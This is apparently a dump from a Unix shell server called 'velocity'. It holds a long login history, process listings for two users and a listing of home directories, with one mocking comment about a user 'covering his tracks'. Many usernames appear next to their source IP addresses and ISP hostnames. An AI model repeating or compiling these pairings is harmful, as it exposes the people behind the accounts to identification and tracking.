cpu ttypd 63-253-113-213.i Thu Jun 18 14:00 - 18:03 (04:03)
|
||
pimpinjg ttyp2 cpe-76-175-20-18 Thu Jun 18 05:11 - 05:12 (00:01)
|
||
pimpinjg ttyp2 cpe-76-175-20-18 Thu Jun 18 04:53 - 05:07 (00:14)
|
||
pimpinjg ttyp2 cpe-76-175-20-18 Thu Jun 18 04:42 - 04:42 (00:00)
|
||
pimpinjg ttypd cpe-76-175-20-18 Thu Jun 18 04:28 - 04:41 (00:12)
|
||
pimpinjg ttypd cpe-76-175-20-18 Thu Jun 18 02:03 - 02:44 (00:41)
|
||
pimpinjg ttypd cpe-76-175-20-18 Wed Jun 17 21:10 - 21:52 (00:42)
|
||
pimpinjg ttype cpe-76-175-20-18 Wed Jun 17 19:37 - 19:37 (00:00)
|
||
pimpinjg ttype cpe-76-175-20-18 Wed Jun 17 19:30 - 19:37 (00:06)
|
||
pimpinjg ttype cpe-76-175-20-18 Wed Jun 17 19:29 - 19:30 (00:00)
|
||
pimpinjg ttype cpe-76-175-20-18 Wed Jun 17 19:27 - 19:29 (00:01)
|
||
pimpinjg ttype cpe-76-175-20-18 Wed Jun 17 19:27 - 19:27 (00:00)
|
||
pimpinjg ttype cpe-76-175-20-18 Wed Jun 17 19:25 - 19:26 (00:00)
|
||
pimpinjg ttype cpe-76-175-20-18 Wed Jun 17 19:23 - 19:25 (00:01)
|
||
romeo ttypg 188.49.118.210 Wed Jun 17 18:35 - 18:35 (00:00) // RoMeO covering his tracks, once again.. lulz
|
||
cpu ttype 63-253-113-213.i Wed Jun 17 17:50 - 17:54 (00:04)
|
||
cpu ttypd 63-253-113-213.i Wed Jun 17 17:33 - 19:56 (02:22)
|
||
cpu ttypd 63-253-113-213.i Wed Jun 17 17:23 - 17:27 (00:04)
|
||
katsst ttypd adsl-76-240-177- Wed Jun 17 12:39 - 13:09 (00:30)
|
||
yaquis ttyp2 ip72-223-92-235. Wed Jun 17 01:49 - 01:54 (00:05)
|
||
katsst ttyp2 adsl-76-240-177- Tue Jun 16 19:46 - 20:16 (00:30)
|
||
katsst ttyp2 adsl-76-240-177- Tue Jun 16 19:33 - 19:46 (00:13)
|
||
katsst ttyp2 adsl-76-240-177- Tue Jun 16 19:24 - 19:33 (00:08)
|
||
katsst ttyp2 adsl-76-240-177- Tue Jun 16 19:16 - 19:24 (00:07)
|
||
katsst ttyp2 adsl-76-240-177- Tue Jun 16 19:08 - 19:16 (00:08)
|
||
katsst ttyp9 adsl-76-240-177- Tue Jun 16 19:01 - 19:08 (00:07)
|
||
katsst ttyp9 adsl-76-240-177- Tue Jun 16 18:44 - 19:01 (00:16)
|
||
katsst ttyp9 adsl-76-240-177- Tue Jun 16 18:37 - 18:44 (00:06)
|
||
yaquis ttypd ip72-223-92-235. Tue Jun 16 18:12 - 18:20 (00:07)
|
||
katsst ttyp9 adsl-76-240-177- Tue Jun 16 18:02 - 18:32 (00:30)
|
||
katsst ttyp2 adsl-76-240-177- Tue Jun 16 13:47 - 14:17 (00:30)
|
||
matt ttyp2 71-91-220-184.dh Tue Jun 16 10:58 - 11:40 (00:42)
|
||
devil ttyp2 190.42.73.135 Tue Jun 16 10:18 - 10:18 (00:00)
|
||
katsst ttyp9 cpe-75-84-149-5. Tue Jun 16 00:10 - 00:40 (00:30)
|
||
katsst ttyp2 cpe-75-84-149-5. Tue Jun 16 00:08 - 00:38 (00:30)
|
||
katsst ttyp2 cpe-75-84-149-5. Mon Jun 15 22:45 - 23:15 (00:30)
|
||
matt ttyp2 71-91-220-184.dh Mon Jun 15 22:05 - 22:19 (00:14)
|
||
kruapra ttyp2 75.80.56.213 Mon Jun 15 21:13 - 21:43 (00:30)
|
||
yaquis ttyp9 189.176.226.15 Mon Jun 15 15:57 - 15:57 (00:00)
|
||
matt ttyp2 71-91-220-184.dh Mon Jun 15 15:52 - 16:18 (00:26)
|
||
chaos1 ttyp2 94-195-18-213.zo Mon Jun 15 13:53 - 14:26 (00:33)
|
||
crrj13 ttyp2 c-24-23-247-110. Mon Jun 15 13:01 - 13:01 (00:00)
|
||
crrj13 ttypd h-67-103-110-220 Mon Jun 15 12:48 - 12:53 (00:05)
|
||
katsst ttyp9 cpe-75-84-149-5. Mon Jun 15 12:31 - 13:01 (00:30)
|
||
ste ttyp2 doc-24-32-94-198 Mon Jun 15 12:22 - 12:59 (00:37)
|
||
katsst ttyp6 cpe-75-84-149-5. Mon Jun 15 05:43 - 06:13 (00:30)
|
||
alexbb ttyp6 53551eb9.cable.c Sun Jun 14 22:36 - 22:41 (00:05)
|
||
katsst ttyp2 cpe-75-84-149-5. Sun Jun 14 22:20 - 22:50 (00:30)
|
||
katsst ttyp9 cpe-75-84-149-5. Sun Jun 14 16:11 - 16:41 (00:30)
|
||
katsst ttyp8 cpe-75-84-149-5. Sun Jun 14 16:11 - 16:41 (00:30)
|
||
kruapra ttyp6 75.80.56.213 Sun Jun 14 13:17 - 13:19 (00:02)
|
||
katsst ttyp2 cpe-75-84-149-5. Sun Jun 14 10:44 - 16:13 (05:29)
|
||
katsst ttyp6 cpe-75-84-149-5. Sun Jun 14 09:48 - 10:18 (00:30)
|
||
katsst ttyp2 cpe-75-84-149-5. Sun Jun 14 07:42 - 08:12 (00:30)
|
||
katsst ttyp2 cpe-75-84-149-5. Sun Jun 14 00:29 - 00:59 (00:30)
|
||
poolboy ttyp2 pool-173-77-179- Sat Jun 13 22:47 - 23:21 (00:33)
|
||
matt ttyp8 71.81.151.8 Sat Jun 13 21:01 - 22:39 (01:37)
|
||
yaquis ttyp6 ip72-223-92-235. Sat Jun 13 20:54 - 21:35 (00:41)
|
||
katsst ttyp2 cpe-75-84-149-5. Sat Jun 13 20:37 - 21:07 (00:30)
|
||
katsst ttyp2 adsl-76-240-177- Sat Jun 13 17:26 - 17:56 (00:30)
|
||
kruapra ttyp2 75.80.56.213 Sat Jun 13 15:57 - 16:04 (00:06)
|
||
kruapra ttyp2 75.80.56.213 Sat Jun 13 15:19 - 15:43 (00:24)
|
||
katsst ttyp2 adsl-76-240-177- Sat Jun 13 13:01 - 13:31 (00:30)
|
||
katsst ttyp2 cpe-75-84-149-5. Sat Jun 13 11:49 - 12:19 (00:30)
|
||
katsst ttyp6 cpe-75-84-149-5. Sat Jun 13 09:15 - 09:45 (00:30)
|
||
matt ttyp2 71-14-179-247.dh Fri Jun 12 23:23 - 00:56 (01:33)
|
||
lyhne1 ttyp2 74-44-57-79.dr01 Fri Jun 12 21:25 - 21:37 (00:11)
|
||
katsst ttyp2 adsl-76-240-177- Fri Jun 12 15:01 - 15:05 (00:03)
|
||
katsst ttyp2 adsl-76-240-177- Fri Jun 12 14:55 - 15:01 (00:06)
|
||
katsst ttyp2 adsl-76-240-177- Fri Jun 12 14:47 - 14:54 (00:06)
|
||
katsst ttyp2 adsl-76-240-177- Fri Jun 12 14:39 - 14:47 (00:07)
|
||
katsst ttyp6 adsl-76-240-177- Fri Jun 12 14:34 - 14:39 (00:04)
|
||
katsst ttyp2 adsl-76-240-177- Fri Jun 12 14:32 - 14:36 (00:03)
|
||
katsst ttyp2 adsl-76-240-177- Fri Jun 12 14:31 - 14:32 (00:01)
|
||
katsst ttyp2 adsl-76-240-177- Fri Jun 12 14:20 - 14:31 (00:10)
|
||
katsst ttyp2 adsl-76-240-177- Fri Jun 12 14:14 - 14:19 (00:05)
|
||
katsst ttyp2 adsl-76-240-177- Fri Jun 12 14:11 - 14:14 (00:03)
|
||
katsst ttyp2 adsl-76-240-177- Fri Jun 12 14:01 - 14:10 (00:09)
|
||
katsst ttyp2 adsl-76-240-177- Fri Jun 12 13:52 - 14:01 (00:08)
|
||
katsst ttyp2 adsl-76-240-177- Fri Jun 12 13:49 - 13:52 (00:03)
|
||
yaquis ttyp6 189.172.83.139 Fri Jun 12 13:31 - 13:36 (00:05)
|
||
katsst ttyp2 adsl-76-240-177- Fri Jun 12 13:26 - 13:49 (00:23)
|
||
matt ttyp2 71.81.144.125 Fri Jun 12 11:56 - 12:16 (00:20)
|
||
matt ttyp2 71-91-221-246.dh Thu Jun 11 22:15 - 03:21 (05:05)
|
||
matt ttyp2 71-91-221-246.dh Thu Jun 11 20:58 - 21:02 (00:03)
|
||
yaquis ttyp2 ip72-223-92-235. Thu Jun 11 20:24 - 20:55 (00:31)
|
||
kruapra ttyp2 75.80.56.213 Thu Jun 11 19:49 - 20:19 (00:30)
|
||
smash ttyp6 88.196.163.223 Thu Jun 11 17:10 - 18:03 (00:53)
|
||
yaquis ttyp2 189.176.224.156 Thu Jun 11 16:20 - 16:24 (00:04)
|
||
yaquis ttyp2 189.176.224.156 Thu Jun 11 16:11 - 16:16 (00:05)
|
||
yaquis ttyp6 189.176.224.156 Thu Jun 11 14:31 - 14:32 (00:01)
|
||
hts ttyp2 pool-71-114-161- Thu Jun 11 10:54 - 10:56 (00:01)
|
||
sysc ttyp6 66.197.170.181 Thu Jun 11 07:33 - 07:52 (00:19)
|
||
sysc ttyp6 66.197.170.181 Thu Jun 11 07:13 - 07:26 (00:13)
|
||
blkgraz ttyp2 71.252.210.34 Thu Jun 11 06:15 - 10:54 (04:39)
|
||
sysc ttyp2 218.236.90.157 Thu Jun 11 05:38 - 05:43 (00:04)
|
||
alexbb ttyp2 83.85.30.185 Thu Jun 11 04:46 - 04:49 (00:03)
|
||
blkgraz ttyp2 71.252.210.34 Thu Jun 11 04:00 - 04:46 (00:45)
|
||
ioplex ttyp2 66.229.254.200 Wed Jun 10 22:30 - 22:44 (00:14)
|
||
ioplex ttyp2 66.229.254.200 Wed Jun 10 22:00 - 22:30 (00:30)
|
||
ioplex ttyp2 66.229.254.200 Wed Jun 10 21:29 - 21:59 (00:30)
|
||
ioplex ttyp2 66.229.254.200 Wed Jun 10 20:59 - 21:29 (00:30)
|
||
matt ttyp6 75.130.209.152 Wed Jun 10 20:54 - 00:28 (03:33)
|
||
ioplex ttyp2 66.229.254.200 Wed Jun 10 20:29 - 20:59 (00:30)
|
||
bollox ttyp2 81.129.70.166 Wed Jun 10 16:42 - 17:01 (00:18)
|
||
qfx ttyp2 62.194.154.102 Wed Jun 10 14:29 - 15:38 (01:08)
|
||
blkgraz ttyp6 71.252.210.34 Wed Jun 10 03:38 - 20:54 (17:16)
|
||
hts ttyp6 71.114.161.104 Wed Jun 10 00:28 - 00:29 (00:00)
|
||
sqd ftp 121.210.177.215 Tue Jun 9 19:46 - 19:51 (00:05)
|
||
crrj13 ttyp6 71.202.99.66 Tue Jun 9 16:50 - 16:51 (00:00)
|
||
katsst ttyp6 76.240.177.107 Tue Jun 9 14:55 - 15:25 (00:30)
|
||
matt ttyp2 71.81.151.141 Tue Jun 9 14:27 - 04:04 (13:36)
|
||
redrum ttyp2 iani.de Tue Jun 9 13:36 - 13:38 (00:02)
|
||
katsst ttyp8 76.240.177.107 Tue Jun 9 13:34 - 14:04 (00:30)
|
||
redrum ttyp2 iani.de Tue Jun 9 13:33 - 13:35 (00:01)
|
||
katsst ttyp2 76.240.177.107 Tue Jun 9 13:01 - 13:31 (00:30)
|
||
chaos1 ttyp6 69.143.254.180 Tue Jun 9 12:53 - 13:36 (00:42)
|
||
redrum ttyp2 iani.de Tue Jun 9 12:48 - 13:01 (00:12)
|
||
qfx ttyp2 62.194.154.102 Tue Jun 9 11:06 - 11:37 (00:31)
|
||
psycoz ttyp2 81.173.252.237 Tue Jun 9 05:28 - 05:34 (00:06)
|
||
alexbb ttyp6 83.85.30.185 Mon Jun 8 23:26 - 03:39 (04:13)
|
||
yaquis ttyp6 72.223.92.235 Mon Jun 8 22:37 - 22:57 (00:20)
|
||
matt ttyp6 75.130.211.22 Mon Jun 8 20:46 - 21:03 (00:16)
|
||
blkgraz ttyp8 71.252.210.34 Mon Jun 8 20:13 - 13:34 (17:21)
|
||
ste ttyp6 69.29.159.182 Mon Jun 8 19:10 - 20:46 (01:36)
|
||
matt ttyp2 75.130.211.22 Mon Jun 8 17:20 - 00:57 (07:37)
|
||
matt ttyp6 75.130.211.22 Mon Jun 8 16:28 - 17:15 (00:46)
|
||
matt ttyp2 75.130.211.22 Mon Jun 8 13:29 - 16:30 (03:01)
|
||
matt ttyp2 75.130.211.22 Mon Jun 8 13:12 - 13:28 (00:16)
|
||
alexbb ttyp8 83.85.30.185 Mon Jun 8 11:26 - 12:18 (00:52)
|
||
matt ttyp6 75.130.211.22 Mon Jun 8 11:24 - 11:32 (00:08)
|
||
matt ttyp2 75.130.211.22 Mon Jun 8 11:21 - 11:51 (00:30)
|
||
chaos1 ttyp2 69.143.254.180 Mon Jun 8 06:25 - 06:29 (00:03)
|
||
alexbb ttyp6 83.85.30.185 Sun Jun 7 21:59 - 22:31 (00:31)
|
||
chaos1 ttyp6 69.143.254.180 Sun Jun 7 21:09 - 21:11 (00:01)
|
||
yaquis ttyp6 72.223.92.235 Sun Jun 7 19:05 - 19:28 (00:22)
|
||
matt ttyp2 71.81.144.135 Sun Jun 7 18:25 - 00:49 (06:23)
|
||
matt ttyp2 71.81.144.135 Sun Jun 7 18:02 - 18:25 (00:23)
|
||
yaquis ttyp2 72.223.92.235 Sun Jun 7 17:25 - 17:56 (00:31)
|
||
psycoz ttyp2 84.44.225.41 Sun Jun 7 17:01 - 17:13 (00:11)
|
||
psycoz ttyp2 84.44.225.41 Sun Jun 7 16:51 - 17:01 (00:10)
|
||
alexbb ftp 53551EB9.cable. Sun Jun 7 15:40 - 15:40 (00:00)
|
||
alexbb ttyp2 83.85.30.185 Sun Jun 7 15:30 - 15:42 (00:12)
|
||
sysc ttyp2 24.183.103.36 Sun Jun 7 12:18 - 12:59 (00:41)
|
||
yaquis ttyp2 72.223.92.235 Sun Jun 7 01:52 - 02:28 (00:35)
|
||
kruapra ttyp2 75.80.56.213 Sat Jun 6 21:29 - 21:59 (00:30)
|
||
cazz1961 ttyp2 81.159.148.247 Sat Jun 6 19:03 - 19:40 (00:36)
|
||
cazz1961 ttyp6 90.205.23.22 Sat Jun 6 18:37 - 19:07 (00:30)
|
||
katsst ttyp2 76.240.177.107 Sat Jun 6 18:24 - 18:54 (00:30)
|
||
katsst ttyp2 76.240.177.107 Sat Jun 6 16:18 - 16:48 (00:30)
|
||
katsst ttyp2 76.240.177.107 Sat Jun 6 12:34 - 13:04 (00:30)
|
||
sysc ttyp2 66.197.170.181 Sat Jun 6 11:54 - 12:08 (00:14)
|
||
yaquis ttyp2 189.176.79.52 Sat Jun 6 11:38 - 11:45 (00:07)
|
||
devil ttyp6 190.42.90.138 Sat Jun 6 09:34 - 09:34 (00:00)
|
||
cazz1961 ttyp2 90.205.23.123 Sat Jun 6 09:21 - 09:55 (00:33)
|
||
howell1 ttyp2 93.97.125.103 Sat Jun 6 08:22 - 08:22 (00:00)
|
||
asriel ttyp2 66.197.170.181 Sat Jun 6 07:36 - 07:37 (00:00)
|
||
sysc ttyp2 66.197.170.181 Sat Jun 6 06:57 - 07:32 (00:35)
|
||
yaquis ttyp2 72.223.92.235 Sat Jun 6 01:18 - 01:44 (00:25)
|
||
yaquis ttyp2 189.176.79.52 Sat Jun 6 01:11 - 01:13 (00:02)
|
||
blkgraz ttyp8 71.252.210.34 Fri Jun 5 18:54 - 11:26 (2+16:31)
|
||
katsst ttyp6 76.240.177.107 Fri Jun 5 18:41 - 19:11 (00:30)
|
||
smash ttyp6 ntora.eml.ee Fri Jun 5 18:07 - 18:07 (00:00)
|
||
smash ttyp8 ntora.eml.ee Fri Jun 5 15:03 - 15:03 (00:00)
|
||
chaos1 ttyp6 69.143.254.180 Fri Jun 5 15:02 - 15:52 (00:50)
|
||
chaos1 ttyp8 69.143.254.180 Fri Jun 5 12:34 - 12:40 (00:06)
|
||
smash ttyp6 ntora.eml.ee Fri Jun 5 12:18 - 13:09 (00:50)
|
||
yaquis ttyp6 72.223.92.235 Fri Jun 5 00:56 - 01:21 (00:24)
|
||
smash ttyp6 ntora.eml.ee Fri Jun 5 00:13 - 00:21 (00:07)
|
||
katsst ttyp6 76.240.177.107 Thu Jun 4 19:41 - 19:45 (00:03)
|
||
katsst ttyp6 76.240.177.107 Thu Jun 4 19:36 - 19:41 (00:05)
|
||
katsst ttyp6 76.240.177.107 Thu Jun 4 19:32 - 19:35 (00:03)
|
||
katsst ttyp6 76.240.177.107 Thu Jun 4 19:27 - 19:31 (00:04)
|
||
katsst ttyp6 76.240.177.107 Thu Jun 4 19:18 - 19:27 (00:09)
|
||
katsst ttyp6 76.240.177.107 Thu Jun 4 19:13 - 19:17 (00:04)
|
||
katsst ttyp6 76.240.177.107 Thu Jun 4 19:04 - 19:13 (00:08)
|
||
katsst ttyp6 76.240.177.107 Thu Jun 4 18:57 - 19:04 (00:06)
|
||
katsst ttyp6 76.240.177.107 Thu Jun 4 18:52 - 18:57 (00:04)
|
||
katsst ttyp6 76.240.177.107 Thu Jun 4 18:41 - 18:52 (00:10)
|
||
katsst ttyp6 76.240.177.107 Thu Jun 4 18:39 - 18:41 (00:02)
|
||
katsst ttyp6 76.240.177.107 Thu Jun 4 18:28 - 18:39 (00:10)
|
||
katsst ttyp6 76.240.177.107 Thu Jun 4 18:18 - 18:24 (00:06)
|
||
katsst ttyp6 76.240.177.107 Thu Jun 4 18:14 - 18:18 (00:03)
|
||
katsst ttyp6 76.240.177.107 Thu Jun 4 18:08 - 18:14 (00:06)
|
||
katsst ttyp8 76.240.177.107 Thu Jun 4 18:06 - 18:06 (00:00)
|
||
katsst ttyp6 76.240.177.107 Thu Jun 4 17:55 - 18:08 (00:12)
|
||
bollox ftp host81-129-70-1 Thu Jun 4 17:47 - 17:49 (00:01)
|
||
katsst ttyp6 76.240.177.107 Thu Jun 4 17:44 - 17:55 (00:11)
|
||
katsst ttyp6 76.240.177.107 Thu Jun 4 17:34 - 17:44 (00:10)
|
||
katsst ttyp6 76.240.177.107 Thu Jun 4 17:29 - 17:34 (00:04)
|
||
smash ttyp6 88.196.163.223 Thu Jun 4 16:39 - 17:06 (00:27)
|
||
bollox ttyp9 81.129.70.166 Thu Jun 4 16:12 - 16:44 (00:32)
|
||
bollox ftp host81-129-70-1 Thu Jun 4 16:05 - 16:09 (00:04)
|
||
chaos1 ttyp8 94.195.18.213 Thu Jun 4 15:50 - 16:23 (00:32)
|
||
chaos1 ttyp6 67.86.132.29 Thu Jun 4 15:49 - 16:15 (00:26)
|
||
chaos1 ttyp6 69.143.254.180 Wed Jun 3 23:06 - 23:52 (00:45)
|
||
apo ttyp8 75.158.79.102 Wed Jun 3 12:38 - 12:44 (00:05)
|
||
apo ttyp6 75.158.79.102 Wed Jun 3 12:20 - 12:54 (00:33)
|
||
blkgraz ttyp2 70.104.27.82 Wed Jun 3 12:01 - 19:16 (2+07:15)
|
||
smash ttyp2 ntora.eml.ee Tue Jun 2 21:03 - 22:35 (01:32)
|
||
kruapra ttyp2 75.80.56.213 Tue Jun 2 20:05 - 20:35 (00:30)
|
||
katsst ttyp6 76.240.177.107 Tue Jun 2 14:30 - 15:00 (00:30)
|
||
blkgraz ttyp6 71.252.210.34 Tue Jun 2 10:39 - 11:36 (00:57)
|
||
blkgraz ttyp2 71.252.210.34 Tue Jun 2 09:51 - 18:17 (08:26)
|
||
crrj13 ttyp2 24.23.247.110 Mon Jun 1 23:54 - 00:00 (00:06)
|
||
crrj13 ttyp2 69.3.47.203 Mon Jun 1 23:19 - 23:32 (00:13)
|
||
redrum ttyp6 ist.kuscheli.ch Mon Jun 1 13:49 - 14:11 (00:21)
|
||
blkgraz ttyp2 71.252.210.34 Mon Jun 1 12:26 - 23:19 (10:53)
|
||
lordy ttyp2 76.108.112.60 Mon Jun 1 06:20 - 06:21 (00:01)
|
||
|
||
|
||
[root@velocity:~]# ps -aux | grep romeo
|
||
root 83591 0.0 0.2 5400 2068 ?? Is 9:16AM 0:00.38 sshd: romeo [priv] (sshd)
|
||
romeo 83595 0.0 0.2 5384 2120 ?? S 9:16AM 0:04.62 sshd: (sshd)
|
||
root 32336 0.0 0.1 1592 892 p2 S+ 7:39PM 0:00.00 grep romeo
|
||
romeo 20712 0.0 0.1 3272 1248 p9 Is Wed06AM 0:00.13 /usr/local/bin/bash
|
||
romeo 66004 0.0 0.7 10124 6844 p9 S+ Sat10AM 2:07.98 irssi -h absolute.ownage.net
|
||
romeo 24414 0.0 0.1 2040 1444 pf S+ 4:23PM 0:00.04 screen -r
|
||
romeo 83597 0.0 0.2 3240 1868 pf Is 9:16AM 0:00.04 -bash (bash)
|
||
[root@velocity:~]#
|
||
|
||
[root@velocity:~]# ps -aux | grep pimpinjg
|
||
root 82323 0.0 0.2 5400 2120 ?? Is 8:47AM 0:00.07 sshd: pimpinjg [priv] (sshd)
|
||
pimpinjg 82325 0.0 0.2 5384 2128 ?? I 8:47AM 0:00.35 sshd: pimpinjg@ttypd (sshd)
|
||
root 32340 0.0 0.1 1548 880 p2 R+ 7:39PM 0:00.00 grep pimpinjg
|
||
pimpinjg 29257 0.0 0.1 2040 1444 pd S+ 6:20PM 0:00.03 screen -r
|
||
pimpinjg 82327 0.0 0.2 3232 1844 pd Is 8:47AM 0:00.03 -bash (bash)
|
||
pimpinjg 20846 0.0 0.2 3268 1856 pe Is 9:24PM 0:00.05 /usr/local/bin/bash
|
||
pimpinjg 82595 0.0 0.7 10476 7720 pe S+ 8:52AM 0:16.87 irssi -h 72.20.28.206
|
||
|
||
|
||
[root@velocity:/home]# ls -la
|
||
total 820
|
||
drwx--x--x 204 root wheel 3584 Jun 17 18:30 ./
|
||
drwxr-xr-x 24 root wheel 512 Jun 15 07:35 ../
|
||
drwxr-xr-x 4 ac1115 ac1115 512 Jul 10 2008 ac1115/
|
||
drwxr-xr-x 4 burnt burnt 512 Apr 22 2005 ad/
|
||
drwxr-xr-x 3 nek0o nek0o 512 Feb 26 2007 adro/
|
||
drwxr-xr-x 3 alexbb alexbb 512 Jun 8 23:27 alexbb/
|
||
drwxr-xr-x 2 anux anux 512 Feb 12 2008 anux/
|
||
drwxr-xr-x 6 apo apo 512 Sep 28 2008 apo/
|
||
drwxr-xr-x 5 1162 1162 512 Mar 7 2007 arcade/
|
||
drwxr-xr-x 2 asriel asriel 512 Jun 6 07:37 asriel/
|
||
drwxr-xr-x 6 athemp athemp 512 Aug 6 2007 athemp/
|
||
drwxr-xr-x 2 daali daali 512 Mar 1 2005 badwolf/
|
||
drwxr-xr-x 3 baxxta baxxta 512 Jul 22 2008 baxxta/
|
||
drwxr-xr-x 2 bbblade1 bbblade1 512 Jan 15 2008 bbblade1/
|
||
drwxr-xr-x 7 1154 1154 512 Oct 9 2005 biffter/
|
||
drwxr-xr-x 3 blake96 blake96 512 Dec 9 2008 blake96/
|
||
drwxr-xr-x 2 1033 1033 512 Mar 1 2005 blazin/
|
||
drwxr-xr-x 5 blkgraz blkgraz 512 Mar 30 23:25 blkgraz/
|
||
drwxr-xr-x 7 blotch blotch 512 Dec 14 2008 blotch/
|
||
drwxr-xr-x 9 bluewish bluewish 512 Apr 13 10:40 bluewish/
|
||
drwxr-xr-x 4 methanl methanl 512 Apr 11 2007 blunted/
|
||
drwxr-xr-x 2 bnoel bnoel 512 Dec 5 2007 bnoel/
|
||
drwxr-xr-x 14 bollox bollox 1024 Feb 18 2008 bollox/
|
||
drwxr-xr-x 4 1146 1146 512 Jul 6 2005 boxing/
|
||
drwxr-xr-x 3 bpunux bpunux 512 Oct 31 2008 bpunux/
|
||
drwxr-xr-x 2 brex132 brex132 512 Jun 7 12:29 brex132/
|
||
drwxr-xr-x 2 brosb4 brosb4 512 Nov 26 2008 brosb4/
|
||
drwxr-xr-x 6 brosco brosco 512 Mar 22 06:08 brosco/
|
||
drwxr-xr-x 5 bruhaha bruhaha 512 Aug 12 2008 bruhaha/
|
||
drwxr-xr-x 5 1226 1226 512 Nov 23 2006 bubba01/
|
||
drwxr-xr-x 13 burnt burnt 1024 Mar 24 2008 burnt/
|
||
drwxr-xr-x 4 1117 1117 512 Mar 18 2005 c00ps/
|
||
drwxr-xr-x 3 1048 1048 512 Apr 20 2007 cake/
|
||
drwxr-xr-x 5 cappy57 cappy57 512 Jul 13 2007 cappy57/
|
||
drwxr-xr-x 4 cassand cassand 512 Mar 19 14:35 cassand/
|
||
drwxr-xr-x 5 cazz1961 cazz1961 512 Apr 14 17:23 cazz1961/
|
||
drwxr-xr-x 6 ceejay ceejay 512 Nov 23 2007 ceejay/
|
||
drwxr-xr-x 8 chaos1 chaos1 1024 Feb 6 15:26 chaos1/
|
||
drwxr-xr-x 6 1251 1251 512 Mar 9 2007 chatnet/
|
||
drwxr-xr-x 6 comedy comedy 512 Jan 20 2007 cheazey/
|
||
drwxr-xr-x 5 chevym4n chevym4n 512 Nov 23 2008 chevym4n/
|
||
drwxr-xr-x 3 chozen1 chozen1 512 Jan 26 19:31 chozen1/
|
||
drwxr-xr-x 5 chrirc chrirc 512 Jun 12 2008 chrirc/
|
||
drwxr-xr-x 2 chrisdad chrisdad 512 Dec 18 2008 chrisdad/
|
||
drwxr-xr-x 2 chriys chriys 512 Dec 3 2008 chriys/
|
||
drwxr-xr-x 7 1085 1085 512 Feb 11 2007 cloudy1/
|
||
drwxr-xr-x 7 cmm cmm 1024 May 9 07:01 cmm/
|
||
drwxr-xr-x 2 comedy comedy 512 May 22 2008 comedy/
|
||
drwxr-xr-x 3 cont cont 512 Jan 11 18:13 cont/
|
||
drwxr-xr-x 2 coolcat coolcat 512 Mar 18 2008 coolcat/
|
||
drwxr-xr-x 2 corley corley 512 May 12 2008 corley/
|
||
drwx--x--x 9 cpu cpu 1024 Apr 14 15:23 cpu/
|
||
drwxr-xr-x 13 crash crash 1024 Feb 19 20:40 crash/
|
||
drwxr-xr-x 7 crazie crazie 512 Nov 26 2007 crazie/
|
||
drwxr-xr-x 8 crazyl crazyl 1024 Apr 13 2007 crazyl/
|
||
drwxr-xr-x 23 crrj13 crrj13 1536 Mar 23 17:27 crrj13/
|
||
drwxr-xr-x 9 1159 1159 512 Sep 5 2005 d3vil/
|
||
drwxrwxrwx 8 daali daali 512 Mar 11 2008 daali/
|
||
drwxr-xr-x 7 dano30 dano30 512 Apr 12 2007 dano30/
|
||
drwxr-xr-x 4 darien9 darien9 1536 Oct 31 2008 darien9/
|
||
drwxr-xr-x 7 dark dark 512 Sep 3 2007 dark/
|
||
drwxr-xr-x 6 darkevil darkevil 512 Mar 25 2008 darkevil/
|
||
drwxr-xr-x 5 darkuno3 darkuno3 512 Mar 10 10:27 darkuno3/
|
||
drwxr-xr-x 2 dasboot dasboot 512 Mar 13 13:55 dasboot/
|
||
drwx------ 11 1093 1093 512 Feb 5 2006 dave/
|
||
drwxr-xr-x 7 dealer dealer 512 Feb 25 01:01 dealer/
|
||
drwxr-xr-x 6 1123 1123 512 Mar 1 2007 deathbal/
|
||
drwxr-xr-x 2 delion1 delion1 512 Feb 22 16:51 delion1/
|
||
drwxr-xr-x 3 cazz1961 cazz1961 512 Mar 1 2005 denial/
|
||
drwxr-xr-x 5 devil devil 512 May 22 10:21 devil/
|
||
drwxr-xr-x 3 sqd sqd 512 Dec 4 2006 digital/
|
||
drwxr-xr-x 8 digitalman digitalman 512 May 20 14:26 digitalman/
|
||
drwxr-xr-x 5 1176 1176 512 Jan 16 2007 dizzle/
|
||
drwxr-xr-x 3 djkarl djkarl 512 Jan 10 12:23 djkarl/
|
||
drwxr-xr-x 2 djspark djspark 512 Jun 24 2008 djspark/
|
||
drwxr-xr-x 7 chrirc chrirc 512 Jan 6 2007 doomed/
|
||
drwxr-xr-x 8 dravas dravas 1024 Sep 29 2007 dravas/
|
||
drwxr-xr-x 2 dv327 dv327 512 Apr 8 2007 drk9/
|
||
drwxr-xr-x 5 1259 1259 512 Apr 11 2007 dust/
|
||
drwxr-xr-x 3 dv327 dv327 512 Aug 9 2008 dv327/
|
||
drwxr-xr-x 8 edgein edgein 512 Feb 13 2008 edgein/
|
||
drwxr-xr-x 8 en0prcv en0prcv 512 Apr 14 2007 en0prcv/
|
||
drwxr-xr-x 4 evino evino 512 Jan 18 2006 evino/
|
||
drwxr-xr-x 7 blkgraz blkgraz 512 Mar 1 2005 evino2k5/
|
||
drwxr-xr-x 4 root wheel 512 Apr 12 2007 execute/
|
||
drwxr-xr-x 3 f3d0r f3d0r 512 Jul 31 2007 f3d0r/
|
||
drwxr-xr-x 2 feed feed 512 Aug 21 2008 feed/
|
||
drwxr-xr-x 4 genosyde genosyde 512 Jan 27 18:18 genosyde/
|
||
drwxr-xr-x 2 grindey grindey 512 Mar 25 2008 grindey/
|
||
drwxr-xr-x 2 groove groove 512 Apr 12 2007 groove/
|
||
drwxr-xr-x 5 grumpy grumpy 512 Feb 4 18:06 grumpy/
|
||
drwxr-xr-x 4 hh360 hh360 512 May 19 2008 hh360/
|
||
drwxr-xr-x 2 hixk hixk 512 Nov 24 2008 hixk/
|
||
drwxr-xr-x 3 howell1 howell1 512 May 29 20:39 howell1/
|
||
drwxr-xr-x 12 hts hts 1024 Jun 20 20:58 hts/
|
||
drwxr-xr-x 2 hw4tbnc hw4tbnc 512 May 11 2008 hw4tbnc/
|
||
drwxr-xr-x 4 ioplex ioplex 512 May 8 20:16 ioplex/
|
||
drwxr-xr-x 6 ircjaymz ircjaymz 512 Mar 18 2008 ircjaymz/
|
||
drwxr-xr-x 2 ircusr ircusr 512 Jan 20 17:49 ircusr/
|
||
drwxr-xr-x 2 itzkorn itzkorn 512 Apr 12 2007 itzkorn/
|
||
drwxr-xr-x 2 izedd izedd 512 Oct 9 2007 izedd/
|
||
drwxr-xr-x 2 jaiven jaiven 512 Feb 16 17:08 jaiven/
|
||
drwxr-xr-x 4 jamesn jamesn 512 May 31 2007 jamesn/
|
||
drwxr-xr-x 8 jax66 jax66 1024 May 14 16:03 jax66/
|
||
